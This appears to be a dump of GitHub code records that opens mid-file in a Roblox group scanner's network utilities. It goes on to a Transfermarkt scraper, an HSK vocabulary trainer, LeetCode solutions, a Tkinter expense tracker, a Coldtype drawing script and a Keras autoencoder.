urlsplit\nfrom os import name as os_name\nimport json\nimport socket\nimport threading\nimport time\nimport ssl\nif os_name == \"nt\":\n SetConsoleTitleW = __import__(\"ctypes\").windll.kernel32.SetConsoleTitleW\n\nclass ChunkCounter:\n def __init__(self):\n self._count = 0\n self._lock = threading.Lock()\n \n def add(self, delta):\n with self._lock:\n self._count += delta\n \n def wait(self, interval):\n time.sleep(interval)\n with self._lock:\n count = self._count\n self._count = 0\n return count\n\ndef send_webhook(url, **kwargs):\n payload = json.dumps(kwargs, separators=(\",\", \":\"))\n hostname, path = url.split(\"://\", 1)[1].split(\"/\", 1)\n if \":\" in hostname:\n hostname, port = hostname.split(\":\", 1)\n port = int(port)\n else:\n port = 443 if \"https\" in url else 80\n sock = create_ssl_socket((hostname, port), ssl_wrap=\"https\" in url)\n try:\n sock.send(f\"POST /{path} HTTP/1.1\\r\\n\"\n f\"Host: {hostname}\\r\\n\"\n f\"Content-Length: {len(payload)}\\r\\n\"\n \"Content-Type: application/json\\r\\n\"\n \"\\r\\n\"\n f\"{payload}\".encode())\n sock.recv(1024 ** 2)\n finally:\n shutdown_socket(sock)\n\ndef make_embed(group_info):\n return dict(\n title=\"Found claimable group\",\n url=f\"https://www.roblox.com/groups/{group_info['id']}\",\n fields=[\n dict(name=\"Group Id\", value=group_info[\"id\"]),\n dict(name=\"Group Name\", value=group_info[\"name\"]),\n dict(name=\"Group Members\", value=group_info[\"memberCount\"]),\n dict(name=\"Group Funds\", value=f\"R$ {group_info['funds']}\" if group_info.get(\"funds\") is not None else \"?\")\n ],\n footer=dict(\n text=\"github.com/h0nde/roblox-group-scanner-v2\"\n ),\n timestamp=datetime.now(timezone.utc).isoformat()\n )\n\ndef create_ssl_socket(addr, ssl_context=None, proxy_addr=None, ssl_wrap=True, timeout=5):\n if ssl_wrap:\n ssl_context = ssl_context or ssl.create_default_context()\n sock = None\n \n try:\n sock = socket.socket()\n sock.settimeout(timeout)\n sock.connect(proxy_addr or addr)\n\n if proxy_addr:\n sock.send(f\"CONNECT {addr[0]}:{addr[1]} HTTP/1.1\\r\\n\\r\\n\".encode())\n if not sock.recv(1024).startswith(b\"HTTP/1.1 20\"):\n raise ConnectionRefusedError(\n \"Proxy server did not return a correct response for tunnel request\")\n\n if ssl_wrap:\n sock = ssl_context.wrap_socket(sock, server_hostname=addr[0])\n return sock\n \n except:\n shutdown_socket(sock)\n raise\n\ndef shutdown_socket(sock):\n if sock:\n try:\n sock.shutdown(socket.SHUT_RDWR)\n except OSError:\n pass\n sock.close()\n\ndef slice_list(lst, num, total):\n per = int(len(lst)/total)\n chunk = lst[per * num : per * (num + 1)]\n return chunk\n\ndef slice_range(r, num, total):\n per = int((r[1]-r[0]+1)/total)\n return (\n r[0] + (num * per),\n r[0] + ((num + 1) * per)\n )\n\ndef update_stats(text):\n if os_name == \"nt\":\n SetConsoleTitleW(text)\n else:\n print(text)\n\ndef set_cpu_affinity(cpu_num):\n if os_name == \"nt\":\n from .windows import set_cpu_affinity\n return set_cpu_affinity(0, 1 << cpu_num)\n else:\n os.sched_setaffinity(0, [cpu_num])","repo_name":"cherryreddrawz/ll","sub_path":"lib/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3534,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"9031573458","text":"from fractions import Fraction\n\nclass myclass:\n \n def __init__(self,L1):\n self.list1=[]\n for i in L1:\n if type(i)==int or type(i)==float or type(i)==Fraction:\n self.list1.append(i)\n\n def show(self):\n for k in self.list1:\n print(k, end=\" \")\n print()\n \n def mean(self):\n print(\"Среднее значение элементов поля списка равно: \",sum(self.list1)/len(self.list1))\n \nlist2=[12,2.3,\"руль\",7/8,\"флыв\",64] \nobj1=myclass(list2)\nobj1.show()\nobj1.mean()\n\nobj2=myclass([120,23,19,56,68])\nobj2.show()\nobj2.mean()\n","repo_name":"AntonUpro/Learn-Python","sub_path":"chapter 8/task 3.py","file_name":"task 3.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"36408628911","text":"# Importation des modules nécessaires\nimport re\nimport requests\nimport pickle\n\n# Définition de l'URL de base de la page à parcourir et du modèle d'en-tête de requête HTTP\nbase_url = \"https://www.transfermarkt.fr/spieler-statistik/wertvollstespieler/marktwertetop?page={}\"\nrequest_headers={'User-Agent': \"(Mozilla/5.0 (Windows; U; Windows NT 6.0 \\;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6\" }\n\n# fonction pour extraire une sous-chaîne de texte entre deux chaînes spécifiées\ndef pap(X,Y):\n pattern = X +'(.+?(?=' + Y + '))' # utiliser les expressions régulières pour trouver la sous-chaîne entre X et Y\n return(re.findall(pattern,html)) # rechercher le motif dans le texte et renvoyer la sous-chaîne trouvée\n\n# fonction qui recherche et affiche un extrait de texte autour de la chaîne X dans le texte txt\ndef find(X):\n print(html[html.find(X)-500:html.find(X)+500])\n\n# Liste pour stocker les URL des joueurs\nurl_joueur = []\n\n# Boucle sur les pages de résultats de recherche\nfor page_num in range(1, 21):\n url = base_url.format(page_num) # Construction de l'URL de la page à parcourir\n response = requests.get(url, headers=request_headers) # Envoi d'une requête HTTP pour récupérer la page\n html = response.text # Extraction du contenu HTML\n\n # Extraire les noms et les URL des joueurs à partir du code HTML de la page\n url_j = pap('
    ')\n for joueur in url_j:\n url_joueur.append(joueur[1])\n\n# Enregistrer les URL de tous les joueurs dans un fichier pickle pour une utilisation ultérieure\npickle.dump (url_joueur, open('Data/url_joueur.dat', 'wb'))\n\n \n","repo_name":"Blizzarman/TransfertMarket","sub_path":"Scraping/Request/Étape 1 - scrap_url.py","file_name":"Étape 1 - scrap_url.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"15393326623","text":"#!/usr/bin/python3\n\"\"\"\nScript to control progress of HSK vocabulary learning\n\"\"\"\n\nimport sys\nimport random\n\n\ndef load_hsk_vocabulary(filename):\n \"\"\"\n Loads HSK vocabulary from the given file.\n \"\"\"\n result = []\n\n with open(filename) as input_file:\n for line in input_file:\n hyeroglyph = \"\"\n reading = \"\"\n meaning = \"\"\n vocabulary_line = line.split('\\t')\n hyeroglyph = vocabulary_line[0].strip()\n reading = vocabulary_line[1].strip()\n meaning = vocabulary_line[2].strip()\n result.append((hyeroglyph, reading + \"\\t\\t\" + meaning))\n\n return result\n\n\ndef known_dict_to_vocabulary(known_dict, vocabulary):\n \"\"\"\n Creates known HSK vocabulary from the given known words list\n and full HSK vocabulary.\n \"\"\"\n result = []\n\n for word in vocabulary:\n if known_dict.get(word[0], False):\n result.append(word)\n\n return result\n\n\ndef load_known_words(filename):\n \"\"\"\n Loads known words from the given filename.\n \"\"\"\n result = {}\n with open(filename) as input_file:\n for line in input_file:\n if ';' in line:\n result[line.strip().split(';')[0]] = True\n elif '\\t' in line:\n result[line.strip().split('\\t')[0]] = True\n else:\n result[line.strip()] = True\n return result\n\n\ndef print_vocabulary(print_array, exclusions=None):\n \"\"\"\n Prints the given vocabulary to stdout\n \"\"\"\n if exclusions is None:\n exclusions = {}\n\n counter = 0\n for word in print_array:\n if len(exclusions) > 0:\n if exclusions.get(word[0], False):\n continue\n counter += 1\n if len(word[0]) < 3:\n print(counter, \"\\t\", word[0], \"\\t\", word[1])\n else:\n print(counter, \"\\t\", word[0], word[1])\n\n\ndef print_progress(learn_words, known_words):\n \"\"\"\n Prints the learning words progress to stdout.\n \"\"\"\n need_to_learn_count = len(learn_words)\n for word in learn_words:\n if len(known_words) > 0:\n if known_words.get(word[0], False):\n need_to_learn_count = need_to_learn_count - 1\n\n start_learn_count = len(learn_words)\n\n print(\"\\nLearned \" + str(start_learn_count - need_to_learn_count) + \":\")\n print('*' * (start_learn_count - need_to_learn_count))\n print(\"\\nNeed to learn \" + str(need_to_learn_count) +\n \"/\" + str(start_learn_count) + \":\")\n print(\"*\" * need_to_learn_count)\n print(\"\")\n\n\ndef get_args():\n \"\"\"\n Returns the args dictionary based on args passed to the script.\n \"\"\"\n\n result = {\n 'hsk-vocabulary-file': 'hsk-vocab.txt',\n 'known-words-file': 'words.duo',\n 'print-full-hsk': False,\n 'print-remaining-hsk': False,\n 'print-known-hsk': False,\n 'print-progress': False,\n 'play-game': False\n }\n\n usage_message = \"\"\"\n Usage: python3 check_hsk_vocab.py\n\n Parameters:\n print-full-hsk Print full HSK vocabulary from the appropriate file.\n print-remaining-hsk Print HSK vocabulary words those are unknown yet.\n print-known-hsk Print only known HSK words with meanings from HSK vocabulary.\n print-progress Print graphics \"I know this count - I need to learn this count\".\n print-non-hsk Print non HSK words from the known wordlist file.\n play-game Run simple question game to check known words.\n \"\"\"\n\n if len(sys.argv) == 1:\n print(usage_message)\n else:\n for arg in sys.argv[1:]:\n if arg == 'print-full-hsk':\n result['print-full-hsk'] = True\n elif arg == 'print-remaining-hsk':\n result['print-remaining-hsk'] = True\n elif arg == 'print-known-hsk':\n result['print-known-hsk'] = True\n elif arg == 'print-progress':\n result['print-progress'] = True\n elif arg == 'play-game':\n result['play-game'] = True\n\n return result\n\n\ndef game_get_question_data(vocabulary):\n \"\"\"\n Returns question entities\n \"\"\"\n max_number = len(vocabulary) - 1\n result_answer_word = random.randint(0, max_number)\n result_choises = [result_answer_word, -1, -1, -1]\n answers_count = 4\n\n for index in range(1, answers_count):\n while True:\n answer_number = random.randint(0, max_number)\n if answer_number not in result_choises:\n result_choises[index] = answer_number\n break\n\n random.shuffle(result_choises)\n\n return result_answer_word, result_choises\n\n\ndef game_print_question(vocabulary, shown_word_number, shown_choices):\n \"\"\"\n Prints question to stdout\n \"\"\"\n print(\"\\n\\t\\t\\t\", vocabulary[shown_word_number][0], \"\\n\")\n index = 0\n for choise in shown_choices:\n index += 1\n print(str(index) + \")\", vocabulary[choise][1])\n\n\ndef play_game(known_vocabulary):\n \"\"\"\n Runs game to refresh knowledge\n \"\"\"\n user_choise = -1\n\n while int(user_choise) != 0:\n word_number, choises = game_get_question_data(known_vocabulary)\n\n game_print_question(known_vocabulary, word_number, choises)\n\n user_choise = input(\"\\nEnter your choice (0 for exit): \")\n\n try:\n if int(user_choise) == 0:\n print(\"\\n\\t\\t\\tGood bye!\\n\")\n elif int(user_choise) == choises.index(word_number) + 1:\n print(\"\\n\\t\\t\\tRight!\\n\")\n else:\n print(\"\\n\\t\\t\\tWrong! Right answer:\",\n choises.index(word_number) + 1, \"\\n\")\n except Exception as ex:\n print(\n \"\\n\\t\\t\\tYour choice is not acceptable! Type only numbers from 1 to 4!\\n\")\n print(\"\\t\\t\\t\", str(ex))\n user_choise = -1\n\n\ndef main():\n \"\"\"\n Main function\n \"\"\"\n start_args = get_args()\n\n known_words = load_known_words(start_args['known-words-file'])\n hsk_vocabulary = load_hsk_vocabulary(start_args['hsk-vocabulary-file'])\n\n if start_args['print-known-hsk']:\n print(\"\\nYou do know this words:\\n\")\n print_vocabulary(known_dict_to_vocabulary(known_words, hsk_vocabulary))\n\n if start_args['print-remaining-hsk']:\n print(\"\\nYou should learn these words:\\n\")\n print_vocabulary(hsk_vocabulary, exclusions=known_words)\n\n if start_args['print-full-hsk']:\n print(\"\\nHSK Vocabulary:\\n\")\n print_vocabulary(hsk_vocabulary)\n\n if start_args['print-progress']:\n print_progress(hsk_vocabulary, known_words)\n\n if start_args['play-game']:\n play_game(known_dict_to_vocabulary(known_words, hsk_vocabulary))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlexanderTyutin/play-python","sub_path":"duolingo-progress-checker/check_hsk_vocab.py","file_name":"check_hsk_vocab.py","file_ext":"py","file_size_in_byte":6785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"17740486206","text":"#!/usr/bin/python\n# -*- coding: UTF-8 -*-\n\"\"\"\n@author:lei\n@utils:func_proc.py.py\n@time:2023/04/29\n@邮箱:leigang431@163.com\n\"\"\"\nimport os\nimport time\nfrom loguru import logger\nimport argparse\n\ntrace = logger.add('runtime.log', level=\"DEBUG\")\n\n\n# 入参解析\ndef parse_args(args):\n logger.debug(\"parse_args start\")\n if args.src_path is None:\n logger.debug(\"src_path args is None\")\n exit()\n if args.dest_path is None:\n logger.debug(\"dest_path args is None\")\n exit()\n if args.keyword is None:\n logger.debug(\"keyword args is None\")\n exit()\n src_path = args.src_path\n dest_path = args.dest_path\n keyword =args.keyword\n return src_path, dest_path,keyword\n\ndef parse_json(json_file):\n logger.debug(\"parse_json:{}\".format(json_file))\n\n\ndef func_proc_run(src_path, dest_path,keyword):\n logger.debug(\"run start\")\n logger.debug(\"src_path:{},dest_path:{},keyword:{}\".format(src_path, dest_path,keyword))\n\n\ndef main(args):\n logger.debug(\"main start\")\n src_path, dest_path,keyword = parse_args(args)\n func_proc_run(src_path, dest_path, keyword)\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description=\"[demo-20230430]Demo of argparse\")\n parser.add_argument('-s','--src_path', default=\"log\",type=str, help='path of file of src log')\n parser.add_argument('-d','--dest_path',default=\"decode_log\",type=str, help='path of dest log')\n parser.add_argument('-k', '--keyword', default=\"keyword.json\", type=str, help='path of keyword.json')\n args = parser.parse_args()\n main(args)\n","repo_name":"leigangblog/gui_test","sub_path":"demo1/src/func_proc.py","file_name":"func_proc.py","file_ext":"py","file_size_in_byte":1583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"38425364981","text":"'''\nhttps://leetcode-cn.com/problems/missing-number/\n\n给定一个包含 [0, n] 中 n 个数的数组 nums ,找出 [0, n] 这个范围内没有出现在数组中的那个数。\n\n示例 1:\n 输入:nums = [3,0,1]\n 输出:2\n 解释:n = 3,因为有 3 个数字,所以所有的数字都在范围 [0,3] 内。2 是丢失的数字,因为它没有出现在 nums 中。\n\n示例 2:\n 输入:nums = [0,1]\n 输出:2\n 解释:n = 2,因为有 2 个数字,所以所有的数字都在范围 [0,2] 内。2 是丢失的数字,因为它没有出现在 nums 中。\n\n示例 3:\n 输入:nums = [9,6,4,2,3,5,7,0,1]\n 输出:8\n 解释:n = 9,因为有 9 个数字,所以所有的数字都在范围 [0,9] 内。8 是丢失的数字,因为它没有出现在 nums 中。\n\n示例 4:\n 输入:nums = [0]\n 输出:1\n 解释:n = 1,因为有 1 个数字,所以所有的数字都在范围 [0,1] 内。1 是丢失的数字,因为它没有出现在 nums 中。\n\n提示:\n n == nums.length\n 1 <= n <= 10^4\n 0 <= nums[i] <= n\n nums 中的所有数字都 独一无二\n\n'''\nfrom typing import List\n\nclass Solution:\n \"\"\" 解法:排序\"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n nums.sort() # 将数组排序\n for i, num in enumerate(nums): # enumerate() 函数用于将一个可遍历的数据对象(如列表、元组或字符串)组合为一个索引序列,同时列出数据和数据下标,一般用在 for 循环当中。\n if num != i: # 根据数组中每个下标处的元素是否和下标相等,得到丢失的数字。\n return i\n return num\n\n \"\"\" 解法:哈希集合\"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n s = set(nums) # 遍历数组 nums,将数组中的每个元素加入哈希集合\n for i in range(len(nums) + 1): # 依次检查从 0 到 n 的每个整数是否在哈希集合中\n if i not in s: # 不在哈希集合中的数字即为丢失的数字\n return i\n\n \"\"\" 解法:数学\"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n n = len(nums)\n total = n * (n + 1) // 2 # 将从 0 到 n 的全部整数之和记为 total,根据高斯求和公式,有 total = n*(n+1)/2\n arrSum = sum(nums) # 将数组 nums 的元素之和记为 arrSum,则 arrSum 比 total 少了丢失的一个数字\n return total - arrSum # 因此丢失的数字即为 total 与 arrSum 之差\n\n \"\"\" 解法:位运算(异或)\n x ^ x = 0 和 x ^ 0 = x \"\"\"\n def missingNumber(self, nums: List[int]) -> int:\n xor = 0\n print (list(enumerate(nums)))\n for i, num in enumerate(nums): # (0, 3), (1, 0), (2, 1)\n xor = xor ^ i ^ num # 利用 a ^ b ^ b = a\n return xor ^ len(nums)\n\n\nif __name__ == \"__main__\":\n nums = [3,0,1]\n sol = Solution()\n result = sol.missingNumber(nums)\n print (result)","repo_name":"jasonmayday/LeetCode","sub_path":"leetcode_algorithm/1_easy/0268_丢失的数字.py","file_name":"0268_丢失的数字.py","file_ext":"py","file_size_in_byte":3097,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"27376633831","text":"# Author: Anthony Corton\n# Date: 12/20/2021\n# Description: Practicing leetcode problem #11, from\n# algorithim topic/Medium List, given an integer array\n# find the container with the most water (biggest possible area)\n\n\nclass Solution:\n def maxArea(self, height: List[int]) -> int:\n left_bound = 0\n right_bound = len(height) - 1\n max_area = 0\n\n while left_bound != right_bound:\n current_area = self.calculateArea(left_bound, right_bound, height)\n\n if current_area > max_area:\n max_area = current_area\n\n if height[left_bound] < height[right_bound]:\n left_bound += 1\n else:\n right_bound -= 1\n\n return max_area\n\n def calculateArea(self, left, right, height):\n # calculate area between pillars\n # first find shortest length\n\n if height[left] > height[right]:\n length = height[right]\n else:\n length = height[left]\n\n # calculate width\n\n width = right - left\n\n # print(\"the left side is\", left)\n # print(\"the right side is\", right)\n\n return length * width","repo_name":"Cortona1/LeetCode-Solutions","sub_path":"Medium Level Problems/ContainerWithMostWater.py","file_name":"ContainerWithMostWater.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"34534218078","text":"import sys\nsys.setrecursionlimit(10**7)\nw = -1\nh = -1\n\ndef dfs(y,x):\n if((y,x) not in arrived):\n arrived.append((y,x))\n for i in range(-1,2):\n for j in range(-1, 2):\n if(c[y+i][x+j] == 1):dfs(y+i,x+j)\n\n #再帰\n # if 8方でまだ見てないところに1がある\n # dfs(n)\n # else\n # return しなくてもいいかも。\n # すべての1が[Arrived]になったとき、dfs(n) が再帰以外で呼ばれた回数が答え\n\n\n # return True\nans = []\nwhile w != 0 and h != 0:\n w,h = map(int,sys.stdin.readline().split())\n\n cnt = 0\n arrived = []\n # print(w)\n # exit()\n if w == 0 and h == 0:\n for i in ans:\n print(i)\n exit()\n else:\n # 上下左右に0を入れてみる\n c = [[0] + list(map(int,input().split())) +[0] if (i > 0 and i < h+1) else [0 for j in range(w+2)] for i in range(0,h+2)]\n for i in range(1,h+1):\n for j in range(1,w+1):\n if(c[i][j] == 1 and (i,j) not in arrived):\n dfs(i,j)\n cnt += 1\n # print(\"cnt\",cnt)\n ans.append(cnt)\n","repo_name":"kibutan/AizuOnlineJudge","sub_path":"AOJ 1160 - 島はいくつある?.py","file_name":"AOJ 1160 - 島はいくつある?.py","file_ext":"py","file_size_in_byte":1151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73708541541","text":"import logging\nimport os\nimport json\nfrom nltk.tokenize.toktok import ToktokTokenizer\nfrom pair import *\n\nclass Corpus(object):\n\n def __init__(self):\n self._toktok = ToktokTokenizer()\n\n def _get_tokenized_sentence(self, sentence):\n return self._toktok.tokenize(sentence) \n\n '''\n Returns a dictionary with word, sentences\n '''\n def _select_sentences_with_diacritics(self, filename, diacritics):\n logging.debug(\"_select_sentences_with_diacritics\")\n\n diacritics_sentences = {}\n SHORT_SENTENCE = 10\n with open(filename, \"r\") as source:\n while True:\n src = source.readline().lower()\n\n if not src:\n break\n \n words = self._get_tokenized_sentence(src)\n for word in words:\n if word not in diacritics:\n continue\n\n if len(words) < SHORT_SENTENCE:\n continue\n\n if word in diacritics_sentences:\n sentences = diacritics_sentences[word]\n else:\n sentences = []\n\n if len(sentences) < 10 and src not in sentences:\n sentences.append(src)\n diacritics_sentences[word] = sentences\n\n for diacritic in diacritics_sentences.keys():\n sentences = diacritics_sentences[diacritic]\n logging.debug(f\"{diacritic}\")\n #for sentence in sentences:\n # logging.debug(f\" {sentence}\")\n \n\n return diacritics_sentences\n\n\n def get_dictionaries_frequencies_and_sentences(self, corpus, pairs):\n logging.debug(\"set_dictionaries_frequencies_and_sentences\")\n\n diacritics, no_diacritics = get_words_dictionaries(pairs)\n\n lines = 0\n words_in_corpus = 0\n with open(corpus, \"r\") as source:\n while True:\n\n src = source.readline().lower()\n\n if not src:\n break\n\n lines = lines + 1\n words = self._get_tokenized_sentence(src)\n words_in_corpus += len(words)\n\n for word in words:\n if word in diacritics:\n frequency = diacritics[word]\n diacritics[word] = frequency + 1\n\n pair = pairs[word]\n if len(pair.diacritic.sentences) < 10 and src not in pair.diacritic.sentences:\n pair.diacritic.sentences.append(src)\n\n if word in no_diacritics:\n frequency = no_diacritics[word]\n no_diacritics[word] = frequency + 1\n\n logging.info(f\"Read corpus {corpus}, lines {lines}, words {words_in_corpus}\")\n return diacritics, no_diacritics\n\n","repo_name":"jordimas/lt-diacritics","sub_path":"corpus.py","file_name":"corpus.py","file_ext":"py","file_size_in_byte":2917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"31992133021","text":"from tkinter import *\nfrom tkinter import ttk\nimport Homepage\nimport database3\nimport PIL\nfrom PIL import Image, ImageTk\n\ndef expenseRecordTable():\n \"\"\"\n Allows user to view the expense record.\n \"\"\"\n\n \"\"\"Database Initialization\"\"\"\n database3.dropTableExpenseRecord()\n database3.createTableExpenseRecord()\n database3.readExpenseRecordFile()\n\n \"\"\"Window Initialization\"\"\"\n # Create the main window\n erTableWindow = Tk()\n erTableWindow.geometry('640x360')\n erTableWindow.title('Expense Record Table')\n erTableWindow['bg'] = 'white'\n erTableWindow.config(bg='white')\n font = (\"Arial\", 8)\n title_font = (\"Arial bold\", 18)\n\n \"\"\"Window Commands\"\"\"\n def homePage():\n #Return user to the login page.\n erTableWindow.destroy()\n Homepage.homepage()\n\n def orgByDate():\n #Organizes Expense Record by Date, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.date\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def orgByPayee():\n #Organizes Expense Record by Payee, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.payee\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def orgByAmount():\n #Organizes Expense Record by Amount Paid, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.amount_paid\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def orgByCategory():\n #Organizes Expense Record by Budget Category, ASC\n database3.recordPerformQuery(\"\"\"SELECT expense_record.date, expense_record.payee, \n expense_record.amount_paid, expense_record.budget_cat FROM expense_record \n ORDER BY expense_record.budget_cat\"\"\", \"tempQuery.txt\")\n updateDisplay()\n\n def updateDisplay():\n #Uses the tempquery from one of the org functions and updates the tree to display the new order.\n with open('tempQuery.txt', 'r') as tempFile:\n newExpenses = [line.strip().split(',') for line in tempFile]\n tempFile.close()\n for val in tree.get_children():\n tree.delete(val)\n for newExpense in newExpenses:\n date = newExpense[0]\n payee = newExpense[1]\n amount = \"-$\" + newExpense[2] #Add a negative sign to indicate outgoing payment\n category = newExpense[3]\n tree.insert('', 'end', values=(date, payee, amount, category))\n\n \"\"\"Window Contents\"\"\"\n #Read expense information from the expense_record.txt file\n with open('expense_record.txt', 'r') as file:\n expenses = [line.strip().split(',') for line in file]\n file.close()\n\n #Create a Frame widget to display the expense list\n frame = Frame(erTableWindow, bd=2, relief=SOLID, bg='white')\n frame.pack(expand=True, fill=BOTH, padx=20, pady=20)\n\n #Add a label to display the page title\n Label(frame,\n text=\"Expense Record\",\n font=title_font,\n padx=20,\n pady=20,\n bg='white').pack(expand=True, fill=BOTH)\n\n #Create a Treeview widget to display the expense information as a table\n tree = ttk.Treeview(frame,\n columns=('date', 'payee', 'amount', 'category'),\n show='headings')\n\n #Add column headers\n tree.heading('date', text='Date', command=orgByDate)\n tree.heading('payee', text='Payee',command=orgByPayee)\n tree.heading('amount', text='Amount', command=orgByAmount)\n tree.heading('category', text='Category', command=orgByCategory)\n\n #Add each expense to the list\n for expense in expenses:\n date = expense[1]\n payee = expense[2]\n amount = \"-\" + expense[\n 3] # Add a negative sign to indicate outgoing payment\n category = expense[4]\n tree.insert('', 'end', values=(date, payee, amount, category))\n\n #Display the expense list in the window with a scrollbar\n scrollbar = ttk.Scrollbar(frame, orient='vertical', command=tree.yview)\n tree.configure(yscroll=scrollbar.set)\n tree.pack(side=LEFT, fill=BOTH, padx=20, pady=20, expand=True)\n scrollbar.pack(side=RIGHT, fill=Y)\n\n #Add a button to return to the homepage\n Button(erTableWindow, text=\"Homepage\", font=font,\n command=homePage).pack(fill=X,\n expand=True,\n side=BOTTOM,\n padx=20,\n pady=20)\n\n # Display the best part of the program\n bestFriend = ImageTk.PhotoImage(PIL.Image.open(\"profile3.jpg\").resize((80, 80)))\n profile_label = Label(erTableWindow, image=bestFriend, bg='white')\n profile_label.image = bestFriend\n profile_label.pack(padx=20, pady=20)\n\n # Launch the main loop\n erTableWindow.mainloop()\n","repo_name":"DIceEvYo/g7_cs343_sp23","sub_path":"expenseRecordTable.py","file_name":"expenseRecordTable.py","file_ext":"py","file_size_in_byte":5025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16564264873","text":"from coldtype import *\nfrom coldtype.axidraw import *\n\nco = Font.ColdtypeObviously()\nmis = Font.Find(\"Mistral\")\n\n@axidrawing()\ndef test_draw(r):\n border = P(r.inset(50)).tag(\"border\")\n \n letters = (StSt(\"COLD\", co, 900, wdth=0.15, ro=1)\n .pen()\n .align(r)\n .tag(\"letters\"))\n\n hatch_rs = r.inset(20).subdivide(250, \"N\")\n hatches = (PS.Enumerate(hatch_rs, lambda x:\n P(x.el) if x.i%2==0 else None)\n .pen()\n .intersection(letters.copy())\n .explode()\n .map(lambda _,p: P().line(p.ambit().ecy))\n .tag(\"hatches\"))\n\n typ = (StSt(\"type\", mis, 650)\n .pen()\n .align(r, tv=1)\n .translate(0, -50)\n .removeOverlap()\n .tag(\"type\"))\n \n return PS([\n border,\n hatches,\n typ\n ])\n\nnumpad = {\n 1: test_draw.draw(\"border\"),\n 2: test_draw.draw(\"hatches\"),\n 3: test_draw.draw(\"type\")\n}","repo_name":"econchick/coldtype","sub_path":"test/visuals/test_axidraw.py","file_name":"test_axidraw.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"39575275416","text":"# !/usr/bin/python\n# -*- coding: utf-8 -*-\nimport easygui\n\nfavor = easygui.choicebox(\"What do you like?\", choices=['apple', 'banana', 'milk'])\neasygui.msgbox(\"Your choice is \" + favor)\nfavor = easygui.buttonbox(\"What do you like?\", choices=['apple', 'banana', 'milk'])\neasygui.msgbox(\"Your choice is \" + favor)\nfavor = easygui.enterbox(\"What do you like?\")\neasygui.msgbox(\"Your enter \" + favor)\n","repo_name":"wula50/tryForGit","sub_path":"venv/icecream.py","file_name":"icecream.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"16215495299","text":"import matplotlib.pyplot as plt\nimport numpy as np\nfrom tensorflow import keras\nfrom tensorflow.python.keras import Input, Model\nfrom tensorflow.python.keras.engine.saving import load_model\nfrom tensorflow.python.keras.layers import Dense\n\n\nclass LossHistory(keras.callbacks.Callback):\n def __init__(self):\n super().__init__()\n self.losses = []\n\n def on_batch_end(self, batch, logs={}):\n self.losses.append(logs.get('loss'))\n\n\ndef autoencoder():\n input_image = Input(shape=(784,))\n # Encoder\n encoder = Dense(units=784, activation='relu')(input_image)\n encoder = Dense(units=512, activation='relu')(encoder)\n encoder = Dense(units=256, activation='relu')(encoder)\n encoder = Dense(units=128, activation='relu')(encoder)\n encoder = Dense(units=64, activation='relu')(encoder)\n encoder = Dense(units=32, activation='relu')(encoder)\n\n # Decoder\n decoder = Dense(units=64, activation='relu')(encoder)\n decoder = Dense(units=128, activation='relu')(decoder)\n decoder = Dense(units=256, activation='relu')(decoder)\n decoder = Dense(units=512, activation='relu')(decoder)\n decoder = Dense(units=784, activation='sigmoid')(decoder)\n\n enc = Model(\n input_image, encoder\n )\n\n autoenc = Model(\n input_image, decoder\n )\n\n autoenc.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])\n\n return enc, autoenc\n\n\ndef trained_encoder():\n \"\"\"Return a keras model\"\"\"\n return load_model(\"encoder_model\", compile=True)\n\n\ndef trained_autoencoder():\n return load_model(\"autoencoder_model\")\n\n\ndef generate_trained_models():\n (x_train, y_train), (x_test, y_test) = keras.datasets.fashion_mnist.load_data()\n x_train = np.reshape(x_train, (60000, 784))\n x_test = np.reshape(x_test, (10000, 784))\n x_train = x_train.astype('float32') / 255\n x_test = x_test.astype('float32') / 255\n encoder, autoenc = autoencoder()\n lossHistory = LossHistory()\n autoenc.summary()\n epochs = 100\n autoenc.fit(x_train, x_train, epochs=epochs, batch_size=128, shuffle=True, validation_data=(x_test, x_test),\n callbacks=[lossHistory])\n\n plt.plot(lossHistory.losses)\n plt.xlabel(\"number of batchs\")\n for i in range(int(epochs / 10)):\n plt.axvline(int(60000 / 128) * i * 10)\n plt.ylabel(\"loss value\")\n 